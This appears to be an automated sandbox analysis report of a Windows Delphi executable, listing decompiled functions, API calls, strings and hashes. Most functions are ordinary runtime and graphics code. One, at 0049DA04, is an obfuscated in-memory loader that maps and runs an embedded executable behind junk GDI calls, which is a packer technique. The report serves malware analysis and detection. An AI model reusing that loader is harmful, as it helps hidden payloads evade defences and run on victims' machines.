GetThemeSysColorBrush, xrefs: 00432E72
CloseThemeData, xrefs: 00432C68
GetThemeDocumentationProperty, xrefs: 00432F6E
IsThemePartDefined, xrefs: 00432D40
GetThemeIntList, xrefs: 00432E18
GetThemePropertyOrigin, xrefs: 00432E2A
GetThemeMetric, xrefs: 00432D76
IsAppThemed, xrefs: 00432EF0
GetCurrentThemeName, xrefs: 00432F5C
GetThemeEnumValue, xrefs: 00432DBE

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 2238633743-2910565190
Opcode ID: 66cde5ce91dca340db7757e9f7d72edbfd72cbbfabcff38d2e0d347f9a2e3616
Instruction ID: ff41df598e27cbc5c4dff7cd951d28389819d8dd6eb5621b8254af16ca0a5ee4
Opcode Fuzzy Hash: 66cde5ce91dca340db7757e9f7d72edbfd72cbbfabcff38d2e0d347f9a2e3616
Instruction Fuzzy Hash: 89A16EF0A41660AFEF00EFA59CC6A2537F8EB097057111A7BB401DF296D67CA911CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F39C, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F39C() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4bc7a4 = E0040F364("VariantChangeTypeEx", E0040EEE0, _t91);
				 *0x4bc7a8 = E0040F364("VarNeg", E0040EF10, _t91);
				 *0x4bc7ac = E0040F364("VarNot", E0040EF10, _t91);
				 *0x4bc7b0 = E0040F364("VarAdd", E0040EF1C, _t91);
				 *0x4bc7b4 = E0040F364("VarSub", E0040EF1C, _t91);
				 *0x4bc7b8 = E0040F364("VarMul", E0040EF1C, _t91);
				 *0x4bc7bc = E0040F364("VarDiv", E0040EF1C, _t91);
				 *0x4bc7c0 = E0040F364("VarIdiv", E0040EF1C, _t91);
				 *0x4bc7c4 = E0040F364("VarMod", E0040EF1C, _t91);
				 *0x4bc7c8 = E0040F364("VarAnd", E0040EF1C, _t91);
				 *0x4bc7cc = E0040F364("VarOr", E0040EF1C, _t91);
				 *0x4bc7d0 = E0040F364("VarXor", E0040EF1C, _t91);
				 *0x4bc7d4 = E0040F364("VarCmp", E0040EF28, _t91);
				 *0x4bc7d8 = E0040F364("VarI4FromStr", E0040EF34, _t91);
				 *0x4bc7dc = E0040F364("VarR4FromStr", E0040EFA0, _t91);
				 *0x4bc7e0 = E0040F364("VarR8FromStr", E0040F00C, _t91);
				 *0x4bc7e4 = E0040F364("VarDateFromStr", E0040F078, _t91);
				 *0x4bc7e8 = E0040F364("VarCyFromStr", E0040F0E4, _t91);
				 *0x4bc7ec = E0040F364("VarBoolFromStr", E0040F150, _t91);
				 *0x4bc7f0 = E0040F364("VarBstrFromCy", E0040F1D0, _t91);
				 *0x4bc7f4 = E0040F364("VarBstrFromDate", E0040F240, _t91);
				_t46 = E0040F364("VarBstrFromBool", E0040F2B0, _t91);
				 *0x4bc7f8 = _t46;
				return _t46;
			}

0x0040f3aa
0x0040f3be
0x0040f3d4
0x0040f3ea
0x0040f400
0x0040f416
0x0040f42c
0x0040f442
0x0040f458
0x0040f46e
0x0040f484
0x0040f49a
0x0040f4b0
0x0040f4c6
0x0040f4dc
0x0040f4f2
0x0040f508
0x0040f51e
0x0040f534
0x0040f54a
0x0040f560
0x0040f576
0x0040f586
0x0040f58c
0x0040f593

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F3A5

Part of subcall function 0040F364: GetProcAddress.KERNEL32(00000000), ref: 0040F382

Strings

VarOr, xrefs: 0040F48F
VarAnd, xrefs: 0040F479
VarNeg, xrefs: 0040F3C9
oleaut32.dll, xrefs: 0040F3A0
VarCyFromStr, xrefs: 0040F529
VarNot, xrefs: 0040F3DF
VarR4FromStr, xrefs: 0040F4E7
VarXor, xrefs: 0040F4A5
VarBoolFromStr, xrefs: 0040F53F
VarR8FromStr, xrefs: 0040F4FD
VarDiv, xrefs: 0040F437
VarCmp, xrefs: 0040F4BB
VarI4FromStr, xrefs: 0040F4D1
VarMod, xrefs: 0040F463
VarBstrFromCy, xrefs: 0040F555
VarBstrFromBool, xrefs: 0040F581
VarSub, xrefs: 0040F40B
VariantChangeTypeEx, xrefs: 0040F3B3
VarIdiv, xrefs: 0040F44D
VarMul, xrefs: 0040F421
VarAdd, xrefs: 0040F3F5
VarBstrFromDate, xrefs: 0040F56B
VarDateFromStr, xrefs: 0040F513

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 2f6ce89c72387ef99e20cb6dce65cce0a9c5c1d8bd96b7ca947cdc72f2d537c5
Instruction ID: 1b8b95555d4afa8fd85e327777a07fd3c0e31aa0472b836f73436f88445f6105
Opcode Fuzzy Hash: 2f6ce89c72387ef99e20cb6dce65cce0a9c5c1d8bd96b7ca947cdc72f2d537c5
Instruction Fuzzy Hash: 984151619047066BD324AB7EB88142673D9E684B243A4C53FB804FBFD5DF3D6C498A2D

Uniqueness

Uniqueness Score: -1.00%

Function 0049DA04, Relevance: 40.8, APIs: 27, Instructions: 311
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0049DA04(signed int __eax, void* __ebx, struct HDC__* __ecx, signed int __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v48;
				char _v52;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v76;
				signed int _v84;
				intOrPtr _v88;
				void* _v92;
				long _v96;
				intOrPtr _v100;
				long _v104;
				signed int _t110;
				signed int _t114;
				void* _t115;
				void* _t127;
				signed int _t128;
				signed int _t143;
				intOrPtr _t157;
				signed int _t205;
				struct HDC__* _t206;
				struct HDC__* _t209;
				signed int _t212;
				signed int _t213;
				struct HDC__* _t216;
				void* _t221;
				intOrPtr _t234;
				void* _t236;
				signed int _t239;
				void* _t242;
				signed int _t247;
				void* _t258;
				intOrPtr _t260;
				intOrPtr _t262;
				signed int _t265;
				void* _t268;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t275;
				intOrPtr* _t276;

				_t264 = __edi;
				_t216 = __ecx;
				_t274 = _t275;
				_t276 = _t275 + 0xffffff8c;
				_push(__edi);
				_v60 = 0;
				_v68 = 0;
				_v64 = 0;
				_v76 = __eax;
				E00404888(_v76);
				_t234 =  *0x49d770; // 0x49d774
				E00404D74( &_v52, _t234);
				_push(_t275);
				_push(0x49dd45);
				_push( *[fs:eax]);
				 *[fs:eax] = _t276;
				0;
				0;
				0;
				if(0 == 0) {
				}
				_push(0x709e01de);
				L00406DDC();
				GetPolyFillMode(0x20);
				_t110 = GetGraphicsMode(_t216);
				if(_t216 != 0x49) {
				}
				_push(1);
				_t205 = _t110;
				GetGraphicsMode(0x73cab443);
				_t114 = _v76;
				_v84 = _t114;
				_push(_t234 - 1);
				_pop(_t236);
				if(1 + _t216 * 0x340 != 0x3a) {
					_t205 = _t205 ^ _t114;
				}
				_t115 = GetStockObject(1);
				if((_t205 & 0x00000058) == 0) {
				}
				_t206 = _t115 + _t236;
				GetBkColor(0xbd523a1);
				GetPixelFormat(_t206);
				_push(0);
				_push(_v84);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				_v8 =  *((intOrPtr*)(_v84 + 0x3c)) +  *_t276;
				_t221 = _t236 + 0x18d;
				GetPixelFormat(0x33);
				_push(_t221);
				_push(_t221);
				_t127 = _t221;
				_t128 = _t127 - 1;
				_t239 = _t128;
				_push(_t128 ^ _t239);
				_pop(_t130);
				_v16 = VirtualAlloc(0,  *(_v8 + 0x50), 0x2000, 1);
				GetGraphicsMode(0x990da1f0);
				if(_t206 != 0x24) {
				}
				_t242 = _t221 + 0x47;
				if((GetROP2(GetGraphicsMode(0x7e1dc1a3)) - _t242 - 0x00000001 & 0x00000013) == 0) {
					_t221 = _t221 - _t242;
				}
				GetROP2(0x81dfdaa5);
				_t208 = 0x279;
				_v12 = _v16 -  *((intOrPtr*)(_v8 + 0x34));
				_t143 = GetBkColor(0x46);
				if(0x279 != 0x62) {
					_t208 = 0x279 * _t143;
				}
				GetMapMode(0x5e);
				if(_t221 != 0x54) {
				}
				_t247 =  *(_v8 + 0x14) & 0x0000ffff;
				_v88 = _v8 + 0x18 + _t247;
				GetGraphicsMode(1);
				_push(_t208);
				L00406DDC();
				_t209 = _t208 ^ 0x000000ec;
				GetMapMode(0x1f);
				_push(4);
				L00406DDC();
				GetGraphicsMode(_t247 - 0x207);
				_push(0x51);
				GetBkColor(_t209);
				_push(0x4a);
				GetBkMode(_t209);
				GetGraphicsMode(_t209);
				_t268 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t268 >= 0) {
					_t272 = _t268 + 1;
					_t213 = 0;
					do {
						0;
						0;
						_t264 = _t213 + _t213 * 4;
						_v96 =  *((intOrPtr*)(_v88 + 8 + _t264 * 8));
						_v100 =  *((intOrPtr*)(_v88 + 0x10 + _t264 * 8));
						_v92 = VirtualAlloc( *((intOrPtr*)(_v88 + 0xc + _t264 * 8)) + _v16, _v96, 0x1000, 4);
						E00402D04( *((intOrPtr*)(_v88 + 0x14 + _t264 * 8)) + _v84, _v100, _v92);
						_t213 = 1 + _t213;
						_t272 = _t272 - 1;
					} while (_t272 != 0);
				}
				_t157 = _v16;
				_v48 =  *((intOrPtr*)(_v8 + 0x28)) + _t157;
				_t255 =  *((intOrPtr*)(_v8 + 0xa0)) + _t157;
				E0049D80C( *((intOrPtr*)(_v8 + 0xa0)) + _t157, _t274);
				E0049D8A4( *((intOrPtr*)(_v8 + 0x80)) + _v16, _t209, _t264, _t268, _t274);
				_t270 = ( *(_v8 + 6) & 0x0000ffff) - 1;
				if(_t270 >= 0) {
					_t271 = _t270 + 1;
					_t212 = 0;
					do {
						_t265 = _t212 + _t212 * 4;
						VirtualProtect( *((intOrPtr*)(_v88 + 0xc + _t265 * 8)) + _v16,  *(_v88 + 8 + _t265 * 8), E0049D790( *((intOrPtr*)(_v88 + 0x24 + _t265 * 8)), _t255),  &_v104);
						_t212 = 1 + _t212;
						_t271 = _t271 - 1;
					} while (_t271 != 0);
				}
				GetMapMode(0x8ca2bcd6);
				if((_t209 & 0x00000023) == 0) {
				}
				_t96 = _t209 + 0x264; // 0x4dd
				GetTextAlign(0x56);
				_t258 = _t96 - 1;
				if(_t258 != 4) {
				}
				_v48(_v16, 1, 0, _t258);
				_pop(_t260);
				 *[fs:eax] = _t260;
				_push(0x49dd4c);
				E004043D8( &_v76);
				E004043FC( &_v68, 3);
				_t262 =  *0x49d770; // 0x49d774
				return E00404E44( &_v52, _t262);
			}

0x0049da04
0x0049da04
0x0049da05
0x0049da07
0x0049da0c
0x0049da0f
0x0049da12
0x0049da15
0x0049da18
0x0049da1e
0x0049da26
0x0049da2c
0x0049da33
0x0049da34
0x0049da39
0x0049da3c
0x0049da45
0x0049da49
0x0049da4d
0x0049da53
0x0049da53
0x0049da58
0x0049da5d
0x0049da64
0x0049da6a
0x0049da77
0x0049da77
0x0049da7b
0x0049da85
0x0049da8c
0x0049da93
0x0049da96
0x0049da99
0x0049da9a
0x0049da9e
0x0049daa0
0x0049daa0
0x0049daa4
0x0049daaf
0x0049daaf
0x0049dab3
0x0049dabf
0x0049dac5
0x0049dad5
0x0049dad6
0x0049dadd
0x0049dae1
0x0049dae8
0x0049daeb
0x0049daee
0x0049daf3
0x0049daf6
0x0049daf9
0x0049dafa
0x0049daff
0x0049db02
0x0049db03
0x0049db1b
0x0049db23
0x0049db2b
0x0049db2b
0x0049db3a
0x0049db55
0x0049db57
0x0049db57
0x0049db5e
0x0049db63
0x0049db6f
0x0049db7a
0x0049db82
0x0049db84
0x0049db84
0x0049db89
0x0049db96
0x0049db96
0x0049dba4
0x0049dbaa
0x0049dbb5
0x0049dbba
0x0049dbbb
0x0049dbc0
0x0049dbc8
0x0049dbcd
0x0049dbcf
0x0049dbdb
0x0049dbe0
0x0049dbe4
0x0049dbea
0x0049dbee
0x0049dbf4
0x0049dc00
0x0049dc03
0x0049dc05
0x0049dc06
0x0049dc08
0x0049dc0e
0x0049dc12
0x0049dc14
0x0049dc1e
0x0049dc28
0x0049dc46
0x0049dc59
0x0049dc5e
0x0049dc5f
0x0049dc5f
0x0049dc08
0x0049dc68
0x0049dc6d
0x0049dc7a
0x0049dc7e
0x0049dc91
0x0049dc9e
0x0049dca1
0x0049dca3
0x0049dca4
0x0049dca6
0x0049dcaa
0x0049dccd
0x0049dcd2
0x0049dcd3
0x0049dcd3
0x0049dca6
0x0049dcdc
0x0049dce7
0x0049dce7
0x0049dceb
0x0049dcf5
0x0049dcfa
0x0049dcfe
0x0049dcfe
0x0049dd11
0x0049dd16
0x0049dd19
0x0049dd1c
0x0049dd24
0x0049dd31
0x0049dd39
0x0049dd44

APIs

GetDCPenColor.GDI32(709E01DE), ref: 0049DA5D
GetPolyFillMode.GDI32(00000020), ref: 0049DA64
GetGraphicsMode.GDI32 ref: 0049DA6A
GetGraphicsMode.GDI32(73CAB443), ref: 0049DA8C
GetStockObject.GDI32(00000001), ref: 0049DAA4
GetBkColor.GDI32(0BD523A1), ref: 0049DABF
GetPixelFormat.GDI32(00000001), ref: 0049DAC5
GetPixelFormat.GDI32(00000033), ref: 0049DAEE
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,00000033), ref: 0049DB16
GetGraphicsMode.GDI32(990DA1F0), ref: 0049DB23
GetGraphicsMode.GDI32(7E1DC1A3), ref: 0049DB42
GetROP2.GDI32(00000000), ref: 0049DB48
GetROP2.GDI32(81DFDAA5), ref: 0049DB5E
GetBkColor.GDI32(00000046), ref: 0049DB7A
GetMapMode.GDI32(0000005E), ref: 0049DB89
GetGraphicsMode.GDI32(00000001), ref: 0049DBB5
GetDCPenColor.GDI32(00000279), ref: 0049DBBB
GetMapMode.GDI32(0000001F), ref: 0049DBC8
GetDCPenColor.GDI32(00000004), ref: 0049DBCF
GetGraphicsMode.GDI32 ref: 0049DBDB
GetBkColor.GDI32(00000279), ref: 0049DBE4
GetBkMode.GDI32(00000279), ref: 0049DBEE
GetGraphicsMode.GDI32(00000279), ref: 0049DBF4
VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000279,00000279,?,00000004,0000001F,00000279,00000001,00000046,81DFDAA5,7E1DC1A3,990DA1F0,00000000), ref: 0049DC41
VirtualProtect.KERNEL32(?,?,00000000,?,00000279,00000279,?,00000004,0000001F,00000279,00000001,00000046,81DFDAA5,7E1DC1A3,990DA1F0,00000000), ref: 0049DCCD
GetMapMode.GDI32(8CA2BCD6), ref: 0049DCDC
GetTextAlign.GDI32(00000056), ref: 0049DCF5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Mode$Graphics$Color$Virtual$AllocFormatPixel$AlignFillObjectPolyProtectStockText
String ID:
API String ID: 1942038030-0
Opcode ID: eba1f450fd32cf26634c80b6290451b881b0274a146affcd51cf818d1a6dc0e9
Instruction ID: 60df5bc7f1cd4416369ef0689efc58ff47d1a0fefa9d7d913ca24a9c08038def
Opcode Fuzzy Hash: eba1f450fd32cf26634c80b6290451b881b0274a146affcd51cf818d1a6dc0e9
Instruction Fuzzy Hash: 82A1A475A002049FEB14EBA9C8C5FAE77F8FF84704F11813AF501EB296D678AD158A58

Uniqueness

Uniqueness Score: -1.00%

Function 00429A78, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00429A78(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0x4bb248; // 0x4a00c4
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E004298D4(CreateCompatibleDC(0));
					_push(_t186);
					_push(0x429cf8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E004298D4(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0x4bc890; // 0xe4080bba
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0x4bc890; // 0xe4080bba
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0x429cff);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E004298D4(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0x429b4b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407554(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x429cff);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x00429a79
0x00429a7b
0x00429a81
0x00429a84
0x00429a87
0x00429a89
0x00429a8c
0x00429a8f
0x00429a93
0x00429a9b
0x00429b54
0x00429b63
0x00429b68
0x00429b69
0x00429b6e
0x00429b71
0x00429b84
0x00429b94
0x00429b99
0x00429ba8
0x00429bb5
0x00429bbe
0x00429bd6
0x00429be5
0x00429bc0
0x00429bcf
0x00429bcf
0x00429bec
0x00429c0e
0x00429c30
0x00429c3d
0x00429c4b
0x00429c72
0x00429c97
0x00429ca1
0x00429cab
0x00429cb4
0x00429cbe
0x00429cbe
0x00429cc7
0x00429cce
0x00429cd1
0x00429cd4
0x00429cdd
0x00429ce9
0x00429ce9
0x00429cf7
0x00429ab3
0x00429ac5
0x00429ad5
0x00429ada
0x00429adb
0x00429ae0
0x00429ae3
0x00429b1f
0x00429b26
0x00429b29
0x00429b2c
0x00429b3e
0x00429b4a
0x00429b4a

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00429ABB
SelectObject.GDI32(?,?), ref: 00429AD0
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00429B1F
SelectObject.GDI32(?,?), ref: 00429B39
DeleteObject.GDI32(?), ref: 00429B45
CreateCompatibleDC.GDI32(00000000), ref: 00429B59
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00429B7A
SelectObject.GDI32(?,?), ref: 00429B8F
SelectPalette.GDI32(?,E4080BBA,00000000), ref: 00429BA3
SelectPalette.GDI32(?,?,00000000), ref: 00429BB5
SelectPalette.GDI32(?,00000000,000000FF), ref: 00429BCA
SelectPalette.GDI32(?,E4080BBA,000000FF), ref: 00429BE0
RealizePalette.GDI32(?), ref: 00429BEC
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00429C0E
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00429C30
SetTextColor.GDI32(?,00000000), ref: 00429C38
SetBkColor.GDI32(?,00FFFFFF), ref: 00429C46
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00429C72
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00429C97
SetTextColor.GDI32(?,?), ref: 00429CA1
SetBkColor.GDI32(?,?), ref: 00429CAB
SelectObject.GDI32(?,00000000), ref: 00429CBE
DeleteObject.GDI32(?), ref: 00429CC7
SelectPalette.GDI32(?,00000000,00000000), ref: 00429CE9
DeleteDC.GDI32(?), ref: 00429CF2

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: d535fbb6402ff41293d0300d37f714f803e66bade4dcb18a5a879d0e25071eba
Instruction ID: 137ece586c3cb9bf3b7d518b345f1369d367df033f7d4c78b9f48a9134d9aae6
Opcode Fuzzy Hash: d535fbb6402ff41293d0300d37f714f803e66bade4dcb18a5a879d0e25071eba
Instruction Fuzzy Hash: E881B4B1A00219AFDB50EFA9DC81EAF77FCAB0C714F150529F618E7281C279AD108B75

Uniqueness

Uniqueness Score: -1.00%

Function 0042D0E0, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042D0E0(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E0042C5D4(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x42d2db);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E004298D4(GetDC(0));
					_v20 = E004298D4(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L17:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x42d2e2);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E004298D4(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x42d293);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E0042CA18(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x42d29a);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x0042d0e1
0x0042d0e3
0x0042d0e9
0x0042d0eb
0x0042d0ed
0x0042d0f1
0x0042d0f6
0x0042d2eb
0x0042d110
0x0042d112
0x0042d119
0x0042d11e
0x0042d123
0x0042d124
0x0042d129
0x0042d12c
0x0042d13b
0x0042d14c
0x0042d162
0x0042d169
0x0042d2ad
0x0042d2ad
0x0042d2af
0x0042d2b2
0x0042d2b5
0x0042d2be
0x0042d2c4
0x0042d2c4
0x0042d2cd
0x00000000
0x0042d2d5
0x0042d2da
0x0042d16f
0x0042d17c
0x0042d185
0x0042d1b1
0x0042d1b6
0x0042d1b7
0x0042d1bc
0x0042d1bf
0x0042d1c6
0x0042d1e6
0x0042d1c8
0x0042d1c8
0x0042d1ce
0x0042d1e2
0x0042d1e2
0x0042d1f4
0x0042d1f9
0x0042d202
0x0042d20b
0x0042d217
0x0042d220
0x0042d220
0x0042d22a
0x0042d24e
0x0042d258
0x0042d261
0x0042d26b
0x0042d26b
0x0042d274
0x0042d277
0x0042d277
0x0042d27e
0x0042d281
0x0042d284
0x0042d292
0x0042d187
0x0042d199
0x0042d29e
0x0042d2a8
0x0042d2a8
0x00000000
0x0042d29e
0x0042d185
0x0042d169

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0042D103
GetDC.USER32(00000000), ref: 0042D131
CreateCompatibleDC.GDI32(?), ref: 0042D142
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0042D15D
SelectObject.GDI32(?,00000000), ref: 0042D177
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042D199
CreateCompatibleDC.GDI32(?), ref: 0042D1A7
SelectObject.GDI32(?), ref: 0042D1EF
SelectPalette.GDI32(?,?,00000000), ref: 0042D202
